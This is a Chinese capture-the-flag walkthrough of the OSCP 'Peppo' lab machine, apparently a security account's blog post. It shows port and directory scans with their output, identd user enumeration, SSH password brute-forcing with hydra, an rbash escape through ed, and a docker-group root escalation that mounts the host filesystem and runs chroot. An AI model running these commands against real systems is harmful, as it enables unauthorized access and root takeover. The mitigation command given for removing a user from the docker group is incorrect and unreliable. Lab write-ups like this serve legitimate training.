OSCP官方靶场 Peppo WP
关注泷羽Sec和泷羽Sec-静安公众号,这里会定期更新与 OSCP、渗透测试等相关的最新文章,帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具
官网打开靶场
信息收集
# Kali攻击机地址
192.168.45.182
# 靶机地址
192.168.147.60扫描端口和目录
# 设置MTU
sudo ip link set dev tun0 mtu 1250
ip link show tun0
# 扫描端口
ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.147.60 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
echo $ports
# 扫描服务
sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.147.60
sudo nmap --script=vuln -p$ports -Pn 192.168.147.60
# 扫描目录
sudo gobuster dir -u http://192.168.147.60:8080 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -t 25
sudo gobuster dir -u http://192.168.147.60:10000 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -t 25 --exclude-length 12
whatweb http://192.168.147.60:8080/扫描结果如下:
┌──(kali㉿kali)-[~]
└─$ echo $ports
22,53,113,5432,8080
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.147.60
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-15 03:13 EDT
Nmap scan report for 192.168.147.60
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
|_auth-owners: root
| ssh-hostkey:
| 2048 75:4c:02:01:fa:1e:9f:cc:e4:7b:52:fe:ba:36:85:a9 (RSA)
| 256 b7:6f:9c:2b:bf:fb:04:62:f4:18:c9:38:f4:3d:6b:2b (ECDSA)
|_ 256 98:7f:b6:40:ce:bb:b5:57:d5:d1:3c:65:72:74:87:c3 (ED25519)
53/tcp closed domain
113/tcp open ident FreeBSD identd
|_auth-owners: nobody
5432/tcp open postgresql PostgreSQL DB 9.6.0 or later
8080/tcp open http WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
|_http-server-header: WEBrick/1.4.2 (Ruby/2.6.6/2020-03-31)
| http-robots.txt: 4 disallowed entries
|_/issues/gantt /issues/calendar /activity /search
|_http-title: Redmine
Aggressive OS guesses: Linux 3.10 - 4.11 (96%), Linux 3.13 - 4.4 (96%), Linux 3.2 - 4.14 (94%), Linux 2.6.32 - 3.13 (93%), Linux 3.8 - 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.13 or 4.2 (90%), Linux 4.4 (90%), Linux 2.6.32 - 3.10 (90%), Linux 5.0 - 5.14 (90%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Linux, FreeBSD; CPE: cpe:/o:linux:linux_kernel, cpe:/o:freebsd:freebsd
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.27 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.147.60
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-15 03:27 EDT
Nmap scan report for 192.168.147.60
Host is up (0.12s latency).
PORT STATE SERVICE
22/tcp open ssh
53/tcp closed domain
113/tcp open ident
5432/tcp open postgresql
8080/tcp open http-proxy
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server''s resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum:
| /login.stm: Belkin G Wireless Router
| /admin.php: Possible admin folder (401 Unauthorized )
| /login.php: Possible admin folder
| /login.html: Possible admin folder
| /admin.cfm: Possible admin folder (401 Unauthorized )
| /login.cfm: Possible admin folder
| /admin.asp: Possible admin folder (401 Unauthorized )
| /login.asp: Possible admin folder
| /admin.aspx: Possible admin folder (401 Unauthorized )
| /login.aspx: Possible admin folder
| /admin.jsp: Possible admin folder (401 Unauthorized )
| /login.jsp: Possible admin folder
| /users.sql: Possible database backup (401 Unauthorized )
| /login/: Login page
| /login.htm: Login page
| /login.jsp: Login page
| /robots.txt: Robots file
| /admin.nsf: Lotus Domino (401 Unauthorized )
| /news/: Potentially interesting folder
|_ /search/: Potentially interesting folder
Nmap done: 1 IP address (1 host up) scanned in 413.78 seconds
┌──(kali㉿kali)-[~]
└─$ whatweb http://192.168.147.60:8080
http://192.168.147.60:8080 [200 OK] ChiliProject, Cookies[_redmine_session], Country[RESERVED][ZZ], HTML5, HTTPServer[WEBrick/1.4.2 (Ruby/2.6.6/2020-03-31)], HttpOnly[_redmine_session], IP[192.168.147.60], JQuery, Redmine, Ruby[2.6.6,WEBrick/1.4.2], Script, Title[Redmine], UncommonHeaders[x-content-type-options,x-download-options,x-permitted-cross-domain-policies,referrer-policy,x-request-id], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=edge], X-XSS-Protection[1; mode=block]
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/newsnews (Status: 200) [Size: 5361]
/searchsearch (Status: 200) [Size: 7933]
/loginlogin (Status: 200) [Size: 5011]
/projectsprojects (Status: 200) [Size: 12258]
/usersusers (Status: 302) [Size: 150] [--> http://192.168.147.60:8080/login?back_url=http%3A%2F%2F192.168.147.60%3A8080%2Fusers]
/adminadmin (Status: 302) [Size: 150] [--> http://192.168.147.60:8080/login?back_url=http%3A%2F%2F192.168.147.60%3A8080%2Fadmin]
/issuesissues (Status: 200) [Size: 19698]
/groupsgroups (Status: 302) [Size: 151] [--> http://192.168.147.60:8080/login?back_url=http%3A%2F%2F192.168.147.60%3A8080%2Fgroups]
/mymy (Status: 302) [Size: 147] [--> http://192.168.147.60:8080/login?back_url=http%3A%2F%2F192.168.147.60%3A8080%2Fmy]
/logoutlogout (Status: 302) [Size: 93] [--> http://192.168.147.60:8080/]
/404404 (Status: 200) [Size: 459]
/settingssettings (Status: 302) [Size: 153] [--> http://192.168.147.60:8080/login?back_url=http%3A%2F%2F192.168.147.60%3A8080%2Fsettings]
/activityactivity (Status: 200) [Size: 7312]
/500500 (Status: 200) [Size: 648]
Progress: 24077 / 220559 (10.92%)^C
没有发现什么
SSH密码爆破
sudo apt install ident-user-enum
ident-user-enum 192.168.147.60 22 113 8080 10000
hydra -L users.txt -P users.txt ssh://192.168.147.60Ident-user-enum 用这个软件来爆破各个端口可能存在的用户名,然后使⽤⽤⼾名=密码的形式试一下。
得到ssh的登录名和密码
[!tip] ssh密码 eleanor
登录后发现终端受限,是只读终端,能执行的命令有限,所以做逃逸
rbash逃逸
参考 https://www.hackingarticles.in/multiple-methods-to-bypass-restricted-shell/
echo $PATH # 查看路径变量
ed
!/bin/bash
export PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin得到第一个flag
提权
查看etc/paawd的时候发现提示有一封邮件
算是触发了一种管理员警告的邮件?我刚刚想要sudo -l 提权的时候发现没有权限。
发现用户是在docker组中,docker提权一下
docker images
docker run -v /:/mnt --rm -it redmine chroot /mnt bash
cat root/proof.txt
得到第二个flag。
总结
入侵路径示意图
flowchart TD
%% 资产列表
A[Kali攻击机 <br> 192.168.45.182]
B[靶机 <br> 192.168.147.60]
C[SSH 密码爆破]
D[rbash 逃逸]
E[Docker 逃逸]
%% 路径关系
A-->|扫描|B
B-->C
C-->D
D-->E
%% 线型:---(实线)、-.->(虚线)、==>(粗箭头)
%% -->|是|:带条件文本的连接
%% 矩形节点[ ],菱形决策节点{ },圆弧方节点()
%% 样式定义
classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px;
classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px;
%% 线型与颜色方案(亮色/暗色通用)
linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0;
%% 应用样式
class A attack;
class B public;
class C,D,E internal;
入侵时间表
gantt
title 攻击时间表
dateFormat YYYY-MM-DD HH:mm
axisFormat %H:%M
section 侦察阶段
目标扫描 :a1, 2025-10-15 15:13, 2025-10-15 15:40
漏洞识别 :a2, after a1, 15m
section 攻击阶段
初始访问 :b1, after a2, 2025-10-15 16:40
权限提升 :crit,b2, after b1, 5m
section 后渗透阶段
数据窃取 :c1, after b2, 5m
补充知识点-Docker提权
这个命令让你获得 root 权限的原因在于 Docker 的特权操作和文件系统挂载的结合使用。以下是详细解释:
🔧 命令分解:
docker run -v /:/mnt --rm -it redmine chroot /mnt bash-
docker run- 启动一个新容器
-
-v /:/mnt- 关键操作:将宿主机的整个根文件系统 (
/) 挂载到容器的/mnt目录 - 这意味着容器可以直接访问宿主机的所有文件
- 关键操作:将宿主机的整个根文件系统 (
-
--rm- 容器退出后自动删除
-
-it- 分配交互式终端
-
redmine- 使用的镜像(这里可以是任意镜像)
-
chroot /mnt bash- 核心逃逸:在容器内执行
chroot命令 - 将根目录切换到宿主机的文件系统 (
/mnt) - 然后启动
bashshell
- 核心逃逸:在容器内执行
🚀 为什么能获得 root 权限:
- Docker 组的特权
- 你的用户属于
docker组(groups=...999(docker)) - Docker 组成员可以运行容器,默认以 root 身份执行容器内命令
- 你的用户属于
- 文件系统挂载
-v /:/mnt使容器能访问宿主机的完整文件系统
- chroot 切换
chroot /mnt将工作环境切换到宿主机的文件系统- 此时你在容器内执行的命令,实际是在操作宿主机
- 权限继承
- 容器内的 root 用户映射到宿主机的 root 用户
- 当你在 chroot 环境中执行命令时,拥有宿主机的 root 权限
⚠️ 安全风险:
这种操作极其危险,因为:
- 完全绕过系统权限控制
- 可以任意修改系统文件
- 能访问所有用户数据
- 相当于直接获得宿主机 root 权限
🔒 系统管理员应该:
- 限制 docker 组权限:
sudo usermod -G eleanor -a # 从docker组移除用户 - 启用用户命名空间隔离:
# /etc/docker/daemon.json { "userns-remap": "default" } - 限制危险挂载:
docker run --cap-drop=ALL --security-opt no-new-privileges ...
🔔 想要获取更多网络安全与编程技术干货?
关注 泷羽Sec-静安 公众号,与你一起探索前沿技术,分享实用的学习资源与工具。我们专注于深入分析,拒绝浮躁,只做最实用的技术分享!💻
马上加入我们,共同成长!🌟
👉 长按或扫描二维码关注公众号
直接回复文章中的关键词,获取更多技术资料与书单推荐!📚